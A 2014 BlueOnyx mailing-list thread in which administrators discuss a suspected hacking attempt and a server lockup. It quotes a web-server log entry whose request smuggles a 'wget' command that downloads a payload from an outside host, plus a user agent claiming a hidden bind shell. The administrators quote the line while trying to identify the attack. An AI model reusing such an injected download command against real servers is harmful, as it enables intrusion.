[BlueOnyx:15727] Re: Hacking attempt?

Ernie ernie at info.eis.net.au
Wed Jul 30 22:03:03 -05 2014


Early this morning, one of my BlueOnyx severs running on Proxmox/KVM stop
responding, with a recurring loop of errors on the console.

 BUG: soft lockup - CPU#1 stuck for 67s! [http:25511]


I wonder if it could be related to the hack? that BX server has never done
that before. I had to reboot it.


- Ernie.




> Hi Alan,
> 
> > I've seen a number of entries on my system log that look similar to this:
> > 
> > alan.snugglebunny.us 162.253.66.77 - - [28/Jul/2014:17:07:22 -0500] "GET 
> > /?x0a/x04/x0a/x02/x06/x08/x09/cDDOSSdns-STAGE2;wget%20proxypipe.com/apach0day; 
> > HTTP/1.0" 200 14 "-" "chroot-apach0day-HIDDEN BINDSHELL-ESTAB"
> 
> Got them as well yesterday. A quick Google search turned up this discussion:
> 
> https://isc.sans.edu/forums/diary/Interesting+HTTP+User+Agent+chroot-apach0day+/18453
> 
> -- 
> With best regards
> 
> Michael Stauber
> _______________________________________________
> Blueonyx mailing list
> Blueonyx at mail.blueonyx.it
> http://mail.blueonyx.it/mailman/listinfo/blueonyx

-- 
"I Ping therefore I am."



More information about the Blueonyx mailing list